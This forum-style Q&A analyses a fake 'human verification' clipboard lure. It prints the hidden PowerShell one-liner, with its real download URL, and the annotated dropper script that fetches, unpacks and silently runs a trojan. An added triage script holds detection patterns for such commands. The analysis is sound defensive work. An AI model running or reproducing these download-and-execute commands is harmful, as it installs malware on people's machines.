This is the input:
cmd.exe /c powershell -WindowStyle Hidden -Command "$rQd='https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.txt'; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;"
After clicking the "human verification" button on some video-download web app, this was on my clipboard. It told me that, in order to verify, I had to press Win + R, Ctrl + V, and then Enter.
Thankfully, I already know what Win + R does, so I did not follow those "verification instructions".
It looks like it downloads something, but I'm not sure what else it downloads.
To help you understand what the command does, and possibly help future readers who run into something similar: this is indeed downloading and executing a trojan.
Determining this takes a few simple steps. First, use Invoke-RestMethod to inspect the contents of the URL:
Invoke-RestMethod https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.txt
You will see that the content is a PowerShell script. Once you notice the suspicious run.zip at the top of the script, pasting that .zip URL into https://www.virustotal.com/ shows that it is indeed malicious:
Adding comments to explain what the code does:
# defines download file
$zxty = 'https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.zip'
# defines destination file for the zip
$qbrw = "$env:APPDATA\file_azlm5.zip"
# defines destination folder for the zip
$lpmk = "$env:APPDATA\Install_4278"
# defines destination path
$vkdy = Join-Path $lpmk 'spPortableRun.exe'
# if the destination folder doesn't exist
if (!(Test-Path $lpmk)) {
    # creates it
    New-Item -Path $lpmk -ItemType Directory
}
try {
    # tries to download `run.zip` to destination file `file_azlm5.zip`
    $ghwd = New-Object System.Net.WebClient
    $ghwd.DownloadFile($zxty, $qbrw)
}
catch {
    exit
}
try {
    Add-Type -AssemblyName 'System.IO.Compression.FileSystem'
    # extract the downloaded zip to destination folder `Install_4278`
    [System.IO.Compression.ZipFile]::ExtractToDirectory($qbrw, $lpmk)
    # and delete the zip file
    Remove-Item $qbrw -Force
}
catch {
    exit
}
try {
    # starts the trojan extracted from the zip file
    # (should've been `spPortableRun.exe` in `Install_4278` folder)
    Start-Process -FilePath $vkdy -WindowStyle Hidden
}
catch {
    exit
}
And, summarized with comments, the -Command you were about to execute:
# defines content URL
$rQd = 'https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.txt'
# creates a WebClient object
$pLs = New-Object System.Net.WebClient
# download the string content
# (this is pretty much like using `Invoke-RestMethod`)
$sLf = $pLs.DownloadString($rQd)
# invoke expression here invokes the PowerShell script
# embedded in the string content
Invoke-Expression $sLf
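As an added example, not part of the original answer, the following PowerShell performs the same kind of triage statically: it flags the indicators the answer points at (Invoke-Expression, DownloadString, a hidden window, a cmd.exe /c wrapper) in a pasted command, extracts its URLs so they can be checked on VirusTotal without fetching anything, and reads the Win+R history (the RunMRU registry key) to see whether such a command was already executed on the machine. The function names, the indicator list and the "two or more indicators" threshold are this example's own choices; the sample string is the command quoted in the question.

```powershell
# Added example: static triage of a "paste this into Win+R" command.
# Nothing here downloads or executes the payload.

function Get-RunCommandIndicators {
    param([Parameter(Mandatory)][string]$CommandLine)

    # Patterns typical of clipboard-to-Run lures; names and regexes are this example's own.
    $indicators = @{
        'Invoke-Expression / iex'   = '(?i)\b(Invoke-Expression|iex)\b'
        'Remote download'           = '(?i)\b(DownloadString|DownloadFile|Invoke-RestMethod|Invoke-WebRequest|irm|iwr)\b'
        'Hidden window'             = '(?i)-WindowStyle\s+Hidden|-w\s+hidden'
        'Encoded / bypass switches' = '(?i)-enc(odedcommand)?\b|-ExecutionPolicy\s+Bypass|-nop\b'
        'Launched via cmd.exe'      = '(?i)^\s*cmd(\.exe)?\s+/c'
    }

    $hits = @(foreach ($name in $indicators.Keys) {
        if ($CommandLine -match $indicators[$name]) { $name }
    })

    # Every URL in the command, for a VirusTotal lookup; the string is never executed.
    $urls = @([regex]::Matches($CommandLine, '(?i)https?://[^\s''"`;]+') |
        ForEach-Object { $_.Value })

    [pscustomobject]@{
        Suspicious = ($hits.Count -ge 2)   # two or more indicators together is a strong signal
        Indicators = $hits
        Urls       = $urls
    }
}

function Get-RunMruHistory {
    # Win+R history lives under this key; values a..z hold entries ending in '\1'.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return @() }
    $item = Get-ItemProperty -Path $key
    $item.PSObject.Properties |
        Where-Object { $_.Name -match '^[a-z]$' } |
        ForEach-Object { $_.Value -replace '\\1$', '' }
}

# Usage: triage the command from the question, then check what this machine has already run.
$sample = 'cmd.exe /c powershell -WindowStyle Hidden -Command "$rQd=''https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.txt''; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;"'
Get-RunCommandIndicators -CommandLine $sample | Format-List

Get-RunMruHistory | ForEach-Object {
    $result = Get-RunCommandIndicators -CommandLine $_
    if ($result.Suspicious) { "Suspicious Run entry: $_" }
}
```

On the quoted command the first call reports all five indicators and the run.txt URL. A non-empty hit from Get-RunMruHistory means the lure was followed, so the Install_4278 folder and the process started from it are the next things to look for.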